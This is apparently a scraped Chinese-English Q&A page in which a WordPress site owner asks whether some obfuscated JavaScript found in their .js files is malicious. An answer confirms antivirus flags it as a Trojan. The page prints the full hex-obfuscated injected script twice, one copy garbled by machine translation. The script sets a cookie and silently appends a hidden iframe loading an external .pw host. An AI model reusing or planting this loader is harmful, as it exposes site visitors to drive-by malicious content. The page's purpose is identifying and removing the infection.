网站 hxxp 上的恶意软件看起来很可疑 [英] Malware on website hxxp looks suspicious

查看：28 发布时间：2021/9/28 19:20:43 javascript php wordpress malware

本文介绍了网站 hxxp 上的恶意软件看起来很可疑的处理方法，对大家解决问题具有一定的参考价值，需要的朋友们下面随着小编来一起学习吧！

问题描述

谷歌在我们的网站上检测到恶意文件/恶意软件，我用它检查过redleg 和其中一些值显示为黄色..


<input type="hidden" name="_wpcf7" value="41"/><input type="hidden" name="_wpcf7_version" value="4.3"/><input type="hidden" name="_wpcf7_locale" value=""/><input type="hidden" name="_wpcf7_unit_tag" value="wpcf7-f41-o1"/><input type="hidden" name="_wpnonce" value="649583a56e"/>

附注.为了安全和隐私，我将此处的网站链接更改为我们的网站

<代码></脚本?<sc?ript type='text/javascript'>/* <![CDATA[ */var _wpcf7 = {"loaderUrl":"http:\/\/ourwebsite.com\/wp-content\/plugins\/contact-form-7\/images\/ajax-loader.gif","sending":"正在发送..."};/* ]]>*/</脚本?<sc?ript type='text/javascript' src=hxxp://ourwebsite.com/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=52e4c650d67bb1484c4a926e5a0eccaf'></脚本?

谁能判断这些脚本是否具有恶意..

我所做的是从我所有的 .js 文件中删除所有这些脚本

/*dd58e691432e362d70bf5b7534f31b87*/var _0xacbd=["\x6F\x6E\x6C\x6F\x61\x64","\x67\x65\x74\x44\x61\x74\x65","\x73\x65\x74\x44\x61\x74\x65","\x63\x6F\x6F\x6B\x69\x65","\x3D","\x3B\x20\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","","\x3D\x28\x5B\x5E\x3B\x5D\x29\x7B\x31\x2C\x7D","\x65\x78\x65\x63"、"\x73\x70\x6C\x69\x74"、"\x61\x64\x2D\x63\x6F\x6F\x6B\x69\x65"、"\x65\x72\x32\x76\x64\x72\x35\x67\x64\x63\x33\x64\x73","\x64\x69\x76","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x68\x74\x74\x70\x3A\x2F\x2F\x73\x74\x61\x74\x73\x2E\x62\x61\x6C\x77\x35\x6\x7A\x76\x69\x63\x7A\x37\x68\x6B\x61\x2E\x70\x77\x2F\x3F\x69\x64\x3D\x36\x39\x34\x37\x36\x32\x67\\x6B\x65\x79\x77\x6F\x72\x64\x3D","\x26\x61\x64\x5F\x69\x64\x3D\x58\x6E\x35\x62\x65\x34","\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x3C\x64\x69\x76\x20\x73\x74\x79\x6C\x65\x3D\x27\x70\x6F\x73\x69\x74\x69\x6F\x6E\x3A\x61\x62\x73\x6F\x6C\x75\x74\x65\x3B\x7A\x2D\x69\x6E\x64\x65\x78\x3A\x31\x3x30\x30\x3B\x74\x6F\x70\x3A\x2D\x31\x30\x30\x30\x70\x78\x3B\x6C\x65\x66\x74\x3A\x2D\x39\x39\x39\x39\x70\x78\x3B\x27\x3E\x3C\x69\x66\x72\x61\x6D\x65\\x73\x72\x63\x3D\x27","\x27\x3E\x3C\x2F\x69\x66\x72\x61\x6D\x65\x3E\x3C\x2F\x64\x69\x76\x3E","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x62\x6F\x64\x79"];window[_0xacbd[0]]=function(){function_0x78a6x1(_0x78a6x2,_0x78a6x3,_0x78a6x4){if(_0x78a6x4){var _0x78a6x5= 新日期();_0x78a6x5[_0xacbd[2]](_0x78a6x5[_6a](x7a6x5[_6]&7a)(x78a6x5[_6]&7a;x8(x)&8;x78a6x5[_0x];8_0x78a6x3){document[_0xacbd[3]]=_0x78a6x2+_0xacbd[4]+_0x78a6x3+(_0x78a6x4?_0xacbd[5]+_0x78a6x5[_0xacbd}el][6])(返回{6}xacbd:[6]];函数_0x78a6x6(_0x78a6x2){var _0x78a6x3=新正则表达式(_0x78a6x2+_0xacbd[8]);var _0x78a6x4=_0x78a6x3[_0xacbd[9]](document[0x7a)[x7a)[x7a](x7a)[0x7a)[0x7a](x7a)[0x7a)[0x7a](x7a)[0x7a](x7a)[0x7a][_3]]][_0xacbd[10]](_0xacbd[4])}else {return false};return _0x78a6x4[1]?_0x78a6x4[1]:false;}var _0x78a6x7=_0x78a6x6(_0xacbd!8_x7x7);_0xacbd[12]){_0x78a6x1(_0xacbd[11],_0xacbd[12],1);var _0x78a6x8=文档[_0xacbd[14]](_0xacbd[13]);var _0x78a6x9=983755;var _0x78a6xa=_0xacbd[15]+_0x78a6x9+_0xacbd[16];_0x78a6x8[_0xacbd[17]];xacbd[17]0xacbd[17][xacbd[17]]=0xacbd[15]+_021]][_0xacbd[20]](_0x78a6x8);};};/*dd58e691432e362d70bf5b7534f31b87*/

解决方案

My Antivirus (ESet Endpoint Security 5.0.2) 将上述 javascript var 块代码检测为木马病毒并拒绝加载此代码启用防病毒软件时的页面.这是一个很好的迹象，这确实是一个糟糕的代码块.

所以回答您的问题，是的，您发布的代码确实是恶意的.

Google has detected malicious file/malware on our website I checked it with redleg and some of these values are displayed yellow..

<div style=" display: none ;">
<input type="hidden" name="_wpcf7" value="41" />
<input type="hidden" name="_wpcf7_version" value="4.3" />
<input type="hidden" name="_wpcf7_locale" value="" />
<input type="hidden" name="_wpcf7_unit_tag" value="wpcf7-f41-o1" />
<input type="hidden" name="_wpnonce" value="649583a56e" />
  </div>

PS. I change our website links here to our website for security purpose and privacy

< sc?ript type='text/javascript' src=hxxp://ourwebsite.com/wp-content/plugins/contact-form-7/includes/js/jquery.form.min.js?ver=52e4c650d67bb1484c4a926e5a0eccaf-2014.06.20'> < / sc?ript >
 < sc?ript type='text/javascript'>
 /* < ![CDATA[ */
 var _wpcf7 = {"loaderUrl":"http:\/\/ourwebsite.com\/wp-content\/plugins\/contact-form-7\/images\/ajax-loader.gif","sending":"Sending ..."};
 /* ]]> */
 < / sc?ript >
< sc?ript type='text/javascript' src=hxxp://ourwebsite.com/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=52e4c650d67bb1484c4a926e5a0eccaf'> < / sc?ript >

Can someone tell if these scripts look malicious ..

What I did is delete all this script from all my .js files

 /*dd58e691432e362d70bf5b7534f31b87*/
 var _0xacbd=["\x6F\x6E\x6C\x6F\x61\x64","\x67\x65\x74\x44\x61\x74\x65","\x73\x65\x74\x44\x61\x74\x65","\x63\x6F\x6F\x6B\x69\x65","\x3D","\x3B\x20\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","","\x3D\x28\x5B\x5E\x3B\x5D\x29\x7B\x31\x2C\x7D","\x65\x78\x65\x63","\x73\x70\x6C\x69\x74","\x61\x64\x2D\x63\x6F\x6F\x6B\x69\x65","\x65\x72\x32\x76\x64\x72\x35\x67\x64\x63\x33\x64\x73","\x64\x69\x76","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x68\x74\x74\x70\x3A\x2F\x2F\x73\x74\x61\x74\x73\x2E\x62\x61\x6C\x77\x35\x65\x7A\x76\x69\x63\x7A\x37\x68\x6B\x61\x2E\x70\x77\x2F\x3F\x69\x64\x3D\x36\x39\x34\x37\x36\x32\x37\x26\x6B\x65\x79\x77\x6F\x72\x64\x3D","\x26\x61\x64\x5F\x69\x64\x3D\x58\x6E\x35\x62\x65\x34","\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x3C\x64\x69\x76\x20\x73\x74\x79\x6C\x65\x3D\x27\x70\x6F\x73\x69\x74\x69\x6F\x6E\x3A\x61\x62\x73\x6F\x6C\x75\x74\x65\x3B\x7A\x2D\x69\x6E\x64\x65\x78\x3A\x31\x30\x30\x30\x3B\x74\x6F\x70\x3A\x2D\x31\x30\x30\x30\x70\x78\x3B\x6C\x65\x66\x74\x3A\x2D\x39\x39\x39\x39\x70\x78\x3B\x27\x3E\x3C\x69\x66\x72\x61\x6D\x65\x20\x73\x72\x63\x3D\x27","\x27\x3E\x3C\x2F\x69\x66\x72\x61\x6D\x65\x3E\x3C\x2F\x64\x69\x76\x3E","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x62\x6F\x64\x79"];window[_0xacbd[0]]=function(){function _0x78a6x1(_0x78a6x2,_0x78a6x3,_0x78a6x4){if(_0x78a6x4){var _0x78a6x5= new Date();_0x78a6x5[_0xacbd[2]](_0x78a6x5[_0xacbd[1]]()+_0x78a6x4);};if(_0x78a6x2&&_0x78a6x3){document[_0xacbd[3]]=_0x78a6x2+_0xacbd[4]+_0x78a6x3+(_0x78a6x4?_0xacbd[5]+_0x78a6x5[_0xacbd[6]]():_0xacbd[7])}else {return false};}function _0x78a6x6(_0x78a6x2){var _0x78a6x3= new RegExp(_0x78a6x2+_0xacbd[8]);var _0x78a6x4=_0x78a6x3[_0xacbd[9]](document[_0xacbd[3]]);if(_0x78a6x4){_0x78a6x4=_0x78a6x4[0][_0xacbd[10]](_0xacbd[4])}else {return false};return _0x78a6x4[1]?_0x78a6x4[1]:false;}var _0x78a6x7=_0x78a6x6(_0xacbd[11]);if(_0x78a6x7!=_0xacbd[12]){_0x78a6x1(_0xacbd[11],_0xacbd[12],1);var _0x78a6x8=document[_0xacbd[14]](_0xacbd[13]);var _0x78a6x9=983755;var _0x78a6xa=_0xacbd[15]+_0x78a6x9+_0xacbd[16];_0x78a6x8[_0xacbd[17]]=_0xacbd[18]+_0x78a6xa+_0xacbd[19];document[_0xacbd[21]][_0xacbd[20]](_0x78a6x8);};};
 /*dd58e691432e362d70bf5b7534f31b87*/

解决方案

My Antivirus (ESet Endpoint Security 5.0.2) detects the above javascript var block code as a Trojan virus and refuses to load this page while my antivirus is enabled. That's a pretty good sign this is indeed a bad code-block.

So to answer your query, yes, the code you posted is indeed malicious.

这篇关于网站 hxxp 上的恶意软件看起来很可疑的文章就介绍到这了，希望我们推荐的答案对大家有所帮助，也希望大家多多支持IT屋！

查看全文

网站 hxxp 上的恶意软件看起来很可疑 [英] Malware on website hxxp looks suspicious

问题描述

相关文章

PHP最新文章

热门教程

热门工具

登录关闭

网站 hxxp 上的恶意软件看起来很可疑 [英] Malware on website hxxp looks suspicious

问题描述

相关文章

PHP最新文章

热门教程

热门工具

登录 关闭

登录关闭